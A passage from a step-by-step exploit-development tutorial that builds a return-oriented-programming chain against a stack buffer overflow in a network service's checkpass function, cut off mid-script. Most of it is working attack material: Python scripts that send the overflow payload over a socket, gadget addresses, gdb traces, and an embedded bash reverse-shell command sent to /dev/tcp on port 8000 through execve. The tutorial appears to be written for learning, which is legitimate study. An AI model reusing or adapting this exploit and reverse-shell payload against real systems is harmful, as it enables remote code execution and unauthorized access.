After searching through the gadgets for a while it becomes obvious that the ecx register is 1 of the more difficult to manipulate, so we will use the eax, ebx and edx registers to manipulate the data and we want to sort out the final value of ecx near the start of the exploit.

While searching through the gadgets, it would be helpful to paste what look to be the most useful gadgets into a seperate file so that you don't have to keep searching through the full list of gadgets.

Building The ROP Exploit

We are going to run into a few major problems while building this exploit.

Firstly, as I already mentioned ecx manipulation is highly restrictive.

Secondly, we are unable to send nulls (0x0) so we will need to put in placeholders and change their value in memory during runtime.

Lastly, we have no idea of any memory addresses within the payload that we will send, so we will have to calulate them during runtime also so that we can reference certain parts of our payload for various reasons.

Because our main 2 problems are to do with values within our payload and because we are unable to exploit this without being able to reference values within our payload we need to approach this problem first.

We do this by getting any address within our payload and calculating the rest of the addresses relative to that address.

The easiest way to do this is by getting the value of esp which, throughout our exploit, will point to a certain part of the payload.

There are various ways to do this (eg. by finding a mov [reg], esp, add [reg], esp) but we will use the following push, pop sequence to get the value of esp into ebp:

1	`0x0807715a : push esp ; mov eax, dword ptr [0x80ccbcc] ; pop ebp ; ret`

And then move the value of ebp into eax:

1	`0x080525d0 : xchg eax, ebp ; ret`

Because eax is the most used register in our avaliable ROP gadgets, its handy to be able to move values into eax for further processing.

Analysing The Exploit

Its important to analyse this exploit throughout the development of the exploit because of the complexity of it.

The methodology that I will use here you will need to use thoroughly while developing the exploit.

First we write a python exploit containing the 2 ROP gadgets we have found so far:

#!/usr/bin/env python

import socket

payload = "A" * 532

payload += "\x5a\x71\x07\x08" # ebp = esp

payload += "\xd0\x25\x05\x08" # xchg eax, ebp

# create the tcp socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# connect to 127.0.0.1 port 9999
s.connect(("127.0.0.1", 9999))

# send our payload
s.send(payload)

# close the socket
s.close()

All this is doing is sending 532 A's to overflow the buffer until we start overwriting the return address.

Then we open the vulnerable application using gdb and run the exploit against it:

appuser@dev:~$ gdb -q ./app-net
Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble checkpass
Dump of assembler code for function checkpass:
   0x08048674 <+0>: push   ebp
   0x08048675 <+1>: mov    ebp,esp
   0x08048677 <+3>: sub    esp,0x228
   0x0804867d <+9>: mov    eax,DWORD PTR [ebp+0x8]
   0x08048680 <+12>:    mov    DWORD PTR [esp],eax
   0x08048683 <+15>:    call   0x8055600 <strlen>
   0x08048688 <+20>:    add    eax,0x1
   0x0804868b <+23>:    mov    DWORD PTR [esp+0x8],eax
   0x0804868f <+27>:    mov    eax,DWORD PTR [ebp+0x8]
   0x08048692 <+30>:    mov    DWORD PTR [esp+0x4],eax
   0x08048696 <+34>:    lea    eax,[ebp-0x210]
   0x0804869c <+40>:    mov    DWORD PTR [esp],eax
   0x0804869f <+43>:    call   0x80556b0 <strncpy>
   0x080486a4 <+48>:    lea    eax,[ebp-0x210]
   0x080486aa <+54>:    mov    DWORD PTR [esp],eax
   0x080486ad <+57>:    call   0x8048eb0 <atoi>
   0x080486b2 <+62>:    mov    DWORD PTR [ebp-0x10],eax
   0x080486b5 <+65>:    cmp    DWORD PTR [ebp-0x10],0xe4ff
   0x080486bc <+72>:    jne    0x80486c7 <checkpass+83>
   0x080486be <+74>:    mov    DWORD PTR [ebp-0xc],0x5
   0x080486c5 <+81>:    jmp    0x80486e0 <checkpass+108>
   0x080486c7 <+83>:    mov    DWORD PTR [esp+0x4],0x80ab924
   0x080486cf <+91>:    lea    eax,[ebp-0x210]
   0x080486d5 <+97>:    mov    DWORD PTR [esp],eax
   0x080486d8 <+100>:   call   0x80555c0 <strcmp>
   0x080486dd <+105>:   mov    DWORD PTR [ebp-0xc],eax
   0x080486e0 <+108>:   mov    eax,DWORD PTR [ebp-0xc]
   0x080486e3 <+111>:   leave  
   0x080486e4 <+112>:   ret    
End of assembler dump.
(gdb) break *0x080486e4
Breakpoint 1 at 0x80486e4
(gdb) define hook-stop
Type commands for definition of "hook-stop".
End with a line saying just "end".
>x/10xw $esp
>x/i $eip
>end
(gdb) display/x $ebp
(gdb) display/x $eax
(gdb) run
Starting program: /home/appuser/app-net 
0xbfffe73c: 0x0807715a  0x080525d0  0xbfffe700  0x00001000
0xbfffe74c: 0x00000000  0xbffff770  0xbffff76c  0x00000000
0xbfffe75c: 0x00000000  0x00000000
=> 0x80486e4 <checkpass+112>:   ret    

Breakpoint 1, 0x080486e4 in checkpass ()
2: /x $eax = 0xffffffcd
1: /x $ebp = 0x41414141
(gdb)

Firstly, on line 4, I disassemble the checkpass function, this is the vulnerable function so our exploit gets triggered when this function returns (runs its ret instruction).

We need to set a breakpoint at the address of this ret instruction (0x080486e4 on line 34 and set on line 36) so that we can trace through and observe the values of the registers as our exploit runs.

Lines 38 to 43, I define a function that runs every time execution stops, this just give us the top 10 values on the stack (as referenced by esp) and the current instruction to be run (as referenced by eip).

Next, on lines 44 and 45, I instruct gdb to display the values of the ebp and eax registers, this will also run every time execution stops, these are the 2 registers we are manipulating with our first 2 gadgets.

Lastly I run the application and when I launch the exploit breakpoint 1 is reached (on line 53).

As you can see, from line 51, eip now points to the ret instruction at the end of the checkpass function, which is where our exploit begins.

The current values of eax and ebp are 0xffffffcd and 0x41414141 respectively.

Looking at the output of x/10xw $esp, which just prints the top 10 values on the stack, the first value is 0x0807715a (just the address of our first gadget) and the second is 0x080525d0 (which is the address of our second gadget).

After the second gadget is run eax should contain 0xbfffe740 (0xbfffe73c + 0x4).

Now we just trace through the next few instructions using the stepi gdb command:

(gdb) stepi
Cannot access memory at address 0x41414145
(gdb) stepi
0xbfffe73c: 0xbfffe740  0x080525d0  0xbfffe700  0x00001000
0xbfffe74c: 0x00000000  0xbffff770  0xbffff76c  0x00000000
0xbfffe75c: 0x00000000  0x00000000
=> 0x807715b <__tzname_max+59>: mov    eax,ds:0x80ccbcc
0x0807715b in __tzname_max ()
2: /x $eax = 0xffffffcd
1: /x $ebp = 0x41414141
(gdb) stepi
0xbfffe73c: 0xbfffe740  0x080525d0  0xbfffe700  0x00001000
0xbfffe74c: 0x00000000  0xbffff770  0xbffff76c  0x00000000
0xbfffe75c: 0x00000000  0x00000000
=> 0x8077160 <__tzname_max+64>: pop    ebp
0x08077160 in __tzname_max ()
2: /x $eax = 0x0
1: /x $ebp = 0x41414141
(gdb) stepi
0xbfffe740: 0x080525d0  0xbfffe700  0x00001000  0x00000000
0xbfffe750: 0xbffff770  0xbffff76c  0x00000000  0x00000000
0xbfffe760: 0x00000000  0x00000000
=> 0x8077161 <__tzname_max+65>: ret    
0x08077161 in __tzname_max ()
2: /x $eax = 0x0
1: /x $ebp = 0xbfffe740
(gdb) stepi
0xbfffe744: 0xbfffe700  0x00001000  0x00000000  0xbffff770
0xbfffe754: 0xbffff76c  0x00000000  0x00000000  0x00000000
0xbfffe764: 0x00000000  0x00000000
=> 0x80525d0 <_int_malloc+2832>:    xchg   ebp,eax
0x080525d0 in _int_malloc ()
2: /x $eax = 0x0
1: /x $ebp = 0xbfffe740
(gdb) stepi
0xbfffe744: 0xbfffe700  0x00001000  0x00000000  0xbffff770
0xbfffe754: 0xbffff76c  0x00000000  0x00000000  0x00000000
0xbfffe764: 0x00000000  0x00000000
=> 0x80525d1 <_int_malloc+2833>:    ret    
0x080525d1 in _int_malloc ()
2: /x $eax = 0xbfffe740
1: /x $ebp = 0x0
(gdb)

So this worked as expected and we now have the address of our second ROP gadget inside eax.

All other addresses can be worked our relative to the address that we currently have.

Calculating An Address

The data that we need to reference we will put at the end of our payload.

Once we have the exploit almost complete we will know the length of our payload but until then we will write the exploit with an arbirary value and change it later.

For this we will use 1000 as the length from the second ROP gadget (the address we just retrieved from esp) to the start of our data.

Next we have to figure out how we will arrange the data at the end of the payload, this will allow us to work out the distances between the different sections of data so that the only value that will need to be changed is the first that we calculate. This will become more clear as we develop more of the exploit.

We need 4 different parts in the data section, the 3 strings and the pointers for the second argument to execve.

Here is how I've laid out the data:

------------------------data------------------------
------------------------strings---------------------
0x2f2f2f2f : ////bin/bash
0x2f6e6962
0x68736162
0xffffffff
--------------------------------------------------
0x632dffff : -c
0xffffffff
--------------------------------------------------
0x6e69622f : /bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1
0x7361622f
0x692d2068
0x20263e20
0x7665642f
0x7063742f
0x3732312f
0x302e302e
0x382f312e
0x20303030
0x31263e30
0xffffffff
-------------------------pointers-------------------
0xbbbbbbbb : pointer to ////bin/bash
0xcccccccc : pointer to -c
0xdddddddd : pointer to args
0xffffffff

I've used 0xffffffff to represent where we want null bytes, these will have to be overwritten during runtime. We will also need to overwrite the pointers with the correct values at runtime, for now I've just put the placeholders 0xbbbbbbbb, 0xcccccccc and 0xdddddddd so that we can easily tell where we are while debugging the exploit.

It's also worth noting that because we are writing up the stack from lower down, the strings will be in normal order, there is no need to think about little endianness for them.

There is technically no reason to use ////bin/bash instead of /bin/bash here, like there was when writing the shellcode, but it rounds this up to 4 bytes so addresses will be slightly easier to calculate (this is 1 place this exploit could be optimized to reduce the size).

Now we need to calculate the address of the last value in our data (0xffffffff at the bottom)

There are 22 double words (a double word is 4 bytes) in the data, so 22 * 4 = 88, therefore we have 88 bytes from the top of our data to the end, as we are using 1000 bytes as a placeholder, for the length from the address we currently have to the top of the data, there are 1088 bytes we need to add to the address we got from esp in our first gadget.

Because we can't use nulls in our payload we have to calculate 1088 at runtime, we can do this using only eax and ebx, but first we have to move the value we currently have in eax, we'll move it to edx using this gadget:

1	`0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret`

Along with moving the value in eax to edx, it pops 3 values off of the stack, we need to deal with this because if we put another gadget directly below this 1 it will be popped off into a register and will not be used.

We will use 0xeeeeeeee to represent junk values that will be popped off the stack but not used.

To calculate 1088 without using null bytes we will use 0xaaaaaaaa and substract the relevent number, to find out that number we do 0xaaaaaaaa - 1088 = 0xaaaaa66a.

We can subtract 2 values in eax and ebx using the following gadget:

1	`0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret`

And we can use the following 2 gadgets to get the required values into eax and ebx respectively:

1 2	`0x080a8576 : pop eax ; ret` 0x08057b7e : pop ebx ; ret

Here I think is a good time to mention the importance of keeping notes while you are creating this exploit, here are my notes so far:

0x0807715a : push esp ; mov eax, dword ptr [0x80ccbcc] ; pop ebp ; ret
0x080525d0 : xchg eax, ebp ; ret
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee
---------------------------- edx contains address of 0x080525d0
---------------------------- time to calculate the distance to the end of data
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaa66a : (0xaaaaaaaa - (1000 + 88)) = distance to end of data
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------- eax contains the distance to the end of data

#################DATA##################

------------------------strings---------------------
0x2f2f2f2f : ////bin/bash
0x2f6e6962
0x68736162
0xffffffff
--------------------------------------------------
0x632dffff : -c
0xffffffff
--------------------------------------------------
0x6e69622f : /bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1
0x7361622f
0x692d2068
0x20263e20
0x7665642f
0x7063742f
0x3732312f
0x302e302e
0x382f312e
0x20303030
0x31263e30
0xffffffff
-------------------------pointers-------------------
0xbbbbbbbb : pointer to ////bin/bash
0xcccccccc : pointer to -c
0xdddddddd : pointer to args
0xffffffff

It's worth noting that to get to a lower value in our payload we need to increase the address and if we want to get to a higher value we need to decrease the address. This is a very important point!

Knowing this, to get to the end of the data from the higher up address we received earlier from esp, we need to add the address to the distance we just calculated.

We can do the addition to calculate the address that we want using this gadget:

1	`0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret`

This will add eax and ebx and store the result in eax.

First we need to move the value from eax into ebx, for that we can use this gadget:

1	`0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret`

And then move the address stored in edx (the first address we retrieved from esp) into eax:

1	`0x0807abcc : mov eax, edx ; ret`

If we put all of these together (while remembering to include junk values for the irrelevant pop instructions contained within the gadgets) we get:

0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop

eax will now contain the address of the end of our data.

If you look again at the data you will realise that this address should contain nulls (its the last lot of 0xffffffff right at the end of our payload).

As we have this address we should go ahead and write nulls here so we don't have to worry about it later.

We can write whatever is stored in the eax register to an address stored in the edx register using this gadget:

1	`0x08083f21 : mov dword ptr [edx], eax ; ret`

Before we can do that we need to move the address from eax into edx:

1	`0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret`

And we need to put 0 into eax:

1	`0x08099c0f : xor eax, eax ; ret`

Using all of this knowledge our notes should look like this (again bear in mind the junk values we need to insert):

0x0807715a : push esp ; mov eax, dword ptr [0x80ccbcc] ; pop ebp ; ret
0x080525d0 : xchg eax, ebp ; ret
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee
---------------------------- edx contains address of 0x080525d0
---------------------------- time to calculate the distance to the end of data
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaa66a : (0xaaaaaaaa - (1000 + 88)) = distance to end of data
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------- eax contains the distance to the end of data
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- eax contains the address of end of data
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret

#################DATA##################

------------------------strings---------------------
0x2f2f2f2f : ////bin/bash
0x2f6e6962
0x68736162
0xffffffff
--------------------------------------------------
0x632dffff : -c
0xffffffff
--------------------------------------------------
0x6e69622f : /bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1
0x7361622f
0x692d2068
0x20263e20
0x7665642f
0x7063742f
0x3732312f
0x302e302e
0x382f312e
0x20303030
0x31263e30
0xffffffff
-------------------------pointers-------------------
0xbbbbbbbb : pointer to ////bin/bash
0xcccccccc : pointer to -c
0xdddddddd : pointer to args
0xffffffff

Now would be a good time to test the exploit again, what we will do here is pad the rest of the exploit so that our data starts 1000 bytes after our second ROP gadget, this way we can see if our exploit is calculating the correct values.

Here is the updated exploit:

#!/usr/bin/env python

import socket

payload = "A" * 532

payload += "\x5a\x71\x07\x08" # ebp = esp

payload += "\xd0\x25\x05\x08" # xchg eax, ebp

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x6a\xa6\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xab\x32\x07\x08" # eax += ebx
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0f\x9c\x09\x08" # eax = 0

payload += "\x21\x3f\x08\x08" # [edx] = eax = 0

payload += "A" * 904 # 1000 - 96 (96 is the current size of the payload from the second ROP gadget

payload += "////bin/bash"
payload += "\xff\xff\xff\xff"

payload += "\xff\xff" + "-c"
payload += "\xff\xff\xff\xff"

payload += "/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1"
payload += "\xff\xff\xff\xff"

payload += "\xbb\xbb\xbb\xbb" # pointer to ////bin/bash
payload += "\xcc\xcc\xcc\xcc" # pointer to -c
payload += "\xdd\xdd\xdd\xdd" # pointer to args
payload += "\xff\xff\xff\xff"

# create the tcp socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# connect to 127.0.0.1 port 9999
s.connect(("127.0.0.1", 9999))

# send our payload
s.send(payload)

# close the socket
s.close()

This time I will set the breakpoint at 0x08083f21 and ensure everything is correct:

(gdb) delete 1
(gdb) break *0x08083f21
Breakpoint 2 at 0x8083f21
(gdb) display/x $ebx
3: /x $ebx = 0x0
(gdb) display/x $edx
4: /x $edx = 0xbfffe740
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/appuser/app-net 

0xbfffe7a4: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe7b4: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe7c4: 0x41414141  0x41414141
=> 0x8083f21 <_dl_get_tls_static_info+17>:  mov    DWORD PTR [edx],eax

Breakpoint 2, 0x08083f21 in _dl_get_tls_static_info ()
4: /x $edx = 0xbfffeb80
3: /x $ebx = 0xeeeeeeee
2: /x $eax = 0x0
1: /x $ebp = 0xeeeeeeee
(gdb) x/xw 0xbfffeb80
0xbfffeb80: 0xffffffff
(gdb) stepi
0xbfffe7a4: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe7b4: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe7c4: 0x41414141  0x41414141
=> 0x8083f23 <_dl_get_tls_static_info+19>:  ret    
0x08083f23 in _dl_get_tls_static_info ()
4: /x $edx = 0xbfffeb80
3: /x $ebx = 0xeeeeeeee
2: /x $eax = 0x0
1: /x $ebp = 0xeeeeeeee
(gdb) x/xw 0xbfffeb80
0xbfffeb80: 0x00000000
(gdb) x/xw 0xbfffeb7c
0xbfffeb7c: 0xdddddddd
(gdb) x/xw 0xbfffeb78
0xbfffeb78: 0xcccccccc
(gdb) x/xw 0xbfffeb74
0xbfffeb74: 0xbbbbbbbb

As you can see, we've successfully written nulls where the f's used to be at the end of our data.

After, I've printed the 3 values further up our payload (which are just where our pointers will be) just to show that it is infact the correct address we are writing to.

Now that we've fixed the nulls at the bottom, the next problem we should approach is setting the value for the ecx register, as this will be the second most difficult challenge.

Setting ECX

The gadget that I felt was the best chance of getting a value into ecx is:

1	`0x0804dca2 : mov ecx, eax ; mov eax, dword ptr [eax] ; test eax, eax ; jne 0x804dca1 ; pop ebp ; ret`

ecx needs to contain the address of the beginning of our pointers in the data, where we have put 0xbbbbbbbb.

There is a big problem here, this code will jump to the fixed address 0x804dca1 if the value pointed to by eax does not contain 0.

This means we first have to write 0 there before we can set ecx.

We will use the exact same method that we just used to write 0 to the end of the data, except this time we will calculate the address relative to the current value of edx (the end of the data section).

We use the following series of ROP gadgets to do this:

0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaa9e : (0xaaaaaaaa - 12) = distance from edx to ////bin/bash pointer
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to ////bin/bash pointer from edx
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains address of ////bin/bash pointer
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret
0x0807abcc : mov eax, edx ; ret

We've used all of these gadgets already so unless we miscalculate the distance somewhere this should all work fine and we can run the other gadget to set ecx.

Once we run the gadget to move eax into ecx the value of ecx is set and will no longer need to be touched, this also means we cannot run any gadgets that alter ecx in anyway.

Calculating The Address Of A String And Setting The Pointer

As we already have the address of the first pointer in edx we might as well set this to the correct value.

This should contain the address of the string ////bin/bash, which is the first string in the data section.

If you work it out you will see that the start of the relevant string is 18 double words, or 72 bytes, from the current value of edx (and ecx).

We can now use the exact same gadgets that we've already used to calculate the address of the string and write it to the location pointed to by edx:

0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaa62 : (0xaaaaaaaa - 72) = distance from edx to ////bin/bash
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to ////bin/bash from ecx/edx
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains address of ////bin/bash
0x08083f21 : mov dword ptr [edx], eax ; ret

Now would be a good time to test the exploit again.

At the end of this we expect ecx and edx to point to the beginning of our pointers, eax should point to our ////bin/bash string which should also be wirrten to the address that ecx and edx points to.

We have also wirtten nulls at the end of our data (but we haven't changed this code and we've already tested it so that should work fine unless we've made a calculation error).

Here is the updated notes:

0x0807715a : push esp ; mov eax, dword ptr [0x80ccbcc] ; pop ebp ; ret
0x080525d0 : xchg eax, ebp ; ret
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee
---------------------------- edx contains address of 0x080525d0
---------------------------- time to calculate the distance to the end of data
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaa66a : (0xaaaaaaaa - (1000 + 88)) = distance to end of data
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------- eax contains the distance to the end of data
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080732ab : add eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- eax contains the address of end of data
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret
---------------------------------------------------- write nulls to the end of our data
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaa9e : (0xaaaaaaaa - 12) = distance from edx to ////bin/bash pointer
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to ////bin/bash pointer from edx
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains address of ////bin/bash pointer
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret
0x0807abcc : mov eax, edx ; ret
0x0804dca2 : mov ecx, eax ; mov eax, dword ptr [eax] ; test eax, eax ; jne 0x804
dca1 ; pop ebp ; ret
0xeeeeeeee : junk value to pop
---------------------------------------------------- ecx contains the address of ////bin/bash pointer
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x08057b7e : pop ebx ; ret
0xaaaaaa62 : (0xaaaaaaaa - 72) = distance from edx to ////bin/bash
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains the distance to ////bin/bash from ecx/edx
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------------------------------- now eax contains address of ////bin/bash
0x08083f21 : mov dword ptr [edx], eax ; ret

#################DATA##################

------------------------strings---------------------
0x2f2f2f2f : ////bin/bash
0x2f6e6962
0x68736162
0xffffffff
--------------------------------------------------
0x632dffff : -c
0xffffffff
--------------------------------------------------
0x6e69622f : /bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1
0x7361622f
0x692d2068
0x20263e20
0x7665642f
0x7063742f
0x3732312f
0x302e302e
0x382f312e
0x20303030
0x31263e30
0xffffffff
-------------------------pointers-------------------
0xbbbbbbbb : pointer to ////bin/bash
0xcccccccc : pointer to -c
0xdddddddd : pointer to args
0xffffffff

This is our updated exploit:

#!/usr/bin/env python

import socket

payload = "A" * 532

payload += "\x5a\x71\x07\x08" # ebp = esp

payload += "\xd0\x25\x05\x08" # xchg eax, ebp

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Work out the distance to the end of the payload

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x6a\xa6\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xab\x32\x07\x08" # eax += ebx
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Write 0 to the end of the data

payload += "\x0f\x9c\x09\x08" # eax = 0

payload += "\x21\x3f\x08\x08" # [edx] = eax = 0

############### Work out the distance to 0xbbbbbbbb

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x9e\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= 12) distance to 0xbbbbbbbb
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of 0xbbbbbbbb)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Move address value into ecx

payload += "\x0e\x82\x0a\x08" # edx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x0f\x9c\x09\x08" # eax = 0

payload += "\x21\x3f\x08\x08" # [edx] = eax = 0

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xa2\xdc\x04\x08" # ecx = eax
payload += "\xee\xee\xee\xee"

############### Work out the distance to ////bin/bash string

payload += "\x76\x85\x0a\x08" # pop eax
payload += "\xaa\xaa\xaa\xaa"

payload += "\x7e\x7b\x05\x08" # pop ebx
payload += "\x62\xaa\xaa\xaa"

payload += "\xfc\x48\x07\x08" # eax -= ebx (= distance to string)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

############### Work out the address of ////bin/bash string and write to pointer

payload += "\xbe\x35\x05\x08" # ebx = eax
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\xcc\xab\x07\x08" # eax = edx

payload += "\xfc\x48\x07\x08" # eax -= ebx (= address of string)
payload += "\xee\xee\xee\xee"
payload += "\xee\xee\xee\xee"

payload += "\x21\x3f\x08\x08" # [edx] = eax

payload += "A" * (1000 - (len(payload) - 540)) # 1000 - current size of the payload from the second ROP gadget

payload += "////bin/bash"
payload += "\xff\xff\xff\xff"

payload += "\xff\xff" + "-c"
payload += "\xff\xff\xff\xff"

payload += "/bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1"
payload += "\xff\xff\xff\xff"

payload += "\xbb\xbb\xbb\xbb" # pointer to ////bin/bash
payload += "\xcc\xcc\xcc\xcc" # pointer to -c
payload += "\xdd\xdd\xdd\xdd" # pointer to args
payload += "\xff\xff\xff\xff"

# create the tcp socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

